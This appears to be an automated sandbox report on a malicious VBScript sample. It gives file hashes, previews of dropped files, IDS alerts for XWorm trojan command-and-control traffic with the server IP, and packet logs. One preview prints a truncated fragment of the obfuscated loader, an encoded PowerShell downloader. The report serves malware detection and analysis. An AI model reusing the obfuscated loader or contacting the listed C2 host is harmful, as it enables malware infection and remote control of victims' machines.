                                                                                        SSDEEP:3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
                                                                                        MD5:85CBF9B1A0E3D8FDA14A86535E0692D9
                                                                                        SHA1:695EAA69C8766E01720DEC322064EE968812F264
                                                                                        SHA-256:AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
                                                                                        SHA-512:0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (11434), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):13424
                                                                                        Entropy (8bit):4.816835217294904
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:Gli/w85Z/lg3ygFD5vV9riJuWVabisK4VabisK1M9MobXRS1Y7g/+PQVd+mDE7Xm:WViQW2KGPgNFGnp3Fu3scKV1GGvf
                                                                                        MD5:FFDFE26D8F87C94AA7AFA9AA2A81D17A
                                                                                        SHA1:4A432DB9B2EDA9E9AB824D432D625969CAE40E27
                                                                                        SHA-256:F9549D5EA907392427C70982212941D6BD9042912BB87BE849D624FC9CB25D7B
                                                                                        SHA-512:32D5282E7CA270924982969E695C67870619D5A9E22B768039BB522A1233C55B5B8FA1303F891444C5FC74D280B09E25400D1EF45F2DDD8694D87901C0C1A4D9
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.. dim estrige , calondro , iristomia , matozinhos , sumelga , Cama , sumelga1.. calondro = " ".. iristomia = "" & matozinhos & calondro & matozinhos & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & matozinhos & calondro & matozinhos & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & matozinhos & calondro & matozinhos & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & matozinhos & calondro & matozinhos & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & matozinhos & calondro & matozinhos & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & matozinhos & calondro & matozinhos & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre"
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllul774/lL:NllUwt
                                                                                        MD5:3BD40D4BDD7802424FE8F2DC2A41C196
                                                                                        SHA1:88F355EA9D58C5A00B2EBB0DC3127C0C13052631
                                                                                        SHA-256:FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
                                                                                        SHA-512:67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:@...e................................................@..........
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29
                                                                                        Entropy (8bit):3.598349098128234
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                                        MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                                        SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                                        SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                                        SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
                                                                                        Entropy (8bit):3.716934834694829
                                                                                        TrID:
                                                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                        • MP3 audio (1001/1) 32.22%
                                                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                                                        • Corel Photo Paint (41/41) 1.32%
                                                                                        File name:72625413524.vbs
                                                                                        File size:113'810 bytes
                                                                                        MD5:2112af95545ceb1de9cca9495afc9a05
                                                                                        SHA1:1f0bcb7572c48c9ffd5bdff0c1afd1ef4afc614d
                                                                                        SHA256:b8d2261380dd02c1d624dc813bdd2cf294ebe902e3c1405036b690230bd66fb0
                                                                                        SHA512:52e03cb6cd2c46d88aba6223c44716759fb549c29687ad70b9f9269513bdd5c2c07de5891daf103c21e6cd855b20b46ad12335dcd87c5fee7afedac1075cf8b9
                                                                                        SSDEEP:3072:gsN2Uqn42YsVWoZiU1DHFUGmgURDFBe0tKl9CP4:4b
                                                                                        TLSH:C2B3AB0267FA1208F5F77B88A97611740B37BD9AA97DC64C05CC290D1FF3A848825BB7
                                                                                        File Content Preview:......'.....c.o.n.s.t. .r.e.t.e.s.a.r. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .e.f.e.c.t.u.a.r. . . . . . .=. .3.....c.o.n.s.t. .g
                                                                                        Icon Hash:68d69b8f86ab9a86
                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        04/23/24-07:55:20.064498TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes845049735134.255.217.251192.168.2.5
                                                                                        04/23/24-07:53:58.364581TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497358450192.168.2.5134.255.217.251
                                                                                        04/23/24-07:55:20.064498TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2845049735134.255.217.251192.168.2.5
                                                                                        04/23/24-07:55:10.823355TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497358450192.168.2.5134.255.217.251
                                                                                        04/23/24-07:53:35.875260TCP2020423ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M144349732116.206.104.215192.168.2.5
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Apr 23, 2024 07:53:23.096405983 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.096452951 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.096610069 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.106590033 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.106627941 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.299766064 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.300096989 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.371063948 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.371093035 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.371545076 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.371629000 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.374281883 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.420124054 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665353060 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665416002 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665460110 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665501118 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.665515900 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665532112 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665585995 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.665585995 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.665610075 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665719032 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.665728092 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.665788889 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.702945948 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.703056097 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.703103065 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.703109026 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.703125954 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.703133106 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.703223944 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.703238964 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:23.703303099 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.703928947 CEST49728443192.168.2.5172.67.187.200
                                                                                        Apr 23, 2024 07:53:23.703953028 CEST44349728172.67.187.200192.168.2.5
                                                                                        Apr 23, 2024 07:53:26.842335939 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:26.842381954 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:26.842495918 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:26.851850986 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:26.851878881 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.041548014 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.041635990 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.043824911 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.043844938 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.044116020 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.058603048 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.104129076 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.261703968 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.261744022 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.261770964 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.261804104 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.261832952 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.261877060 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.261941910 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.262119055 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.262162924 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.262171984 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263160944 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263212919 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263216019 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263231993 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263277054 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263286114 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263344049 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263386965 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263392925 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263434887 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263475895 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263479948 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263489008 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263530970 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263539076 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263608932 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263648033 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263678074 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263684034 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263716936 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263724089 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263900995 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263956070 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.263971090 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.263982058 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264019966 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.264029026 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264179945 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264224052 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.264230967 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264736891 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264796019 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.264803886 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264903069 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.264949083 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.264956951 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.265042067 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.265085936 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.265091896 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.265830994 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.265875101 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.265882969 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266002893 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266052008 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.266057968 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266396999 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266474009 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.266474009 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266498089 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266546965 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.266624928 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266922951 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.266984940 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.266993046 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.316731930 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.350200891 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.350215912 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.350291014 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.350302935 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.350347996 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.351447105 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.351501942 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.351615906 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.351687908 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.351836920 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.351891994 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.352185965 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.352241993 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.352710009 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.352762938 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.353192091 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.353241920 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.353518009 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.353571892 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.353665113 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.353717089 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.354144096 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.354211092 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.354496002 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.354552984 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.355029106 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.355086088 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.355312109 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.355364084 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.355854988 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.355911016 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.356193066 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.356245041 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.356630087 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.356683016 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.356879950 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.356931925 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.438030005 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.438173056 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.438254118 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.438318968 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.438431025 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.438503981 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.439086914 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.439145088 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.439202070 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.439260006 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.439349890 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.439410925 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.439945936 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.440001965 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.440429926 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.440490961 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.440506935 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.440531969 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.440601110 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.440615892 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.440670013 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.441304922 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.441365957 CEST49729443192.168.2.5172.67.215.45
                                                                                        Apr 23, 2024 07:53:27.441422939 CEST44349729172.67.215.45192.168.2.5
                                                                                        Apr 23, 2024 07:53:27.441485882 CEST49729443192.168.2.5172.67.215.45
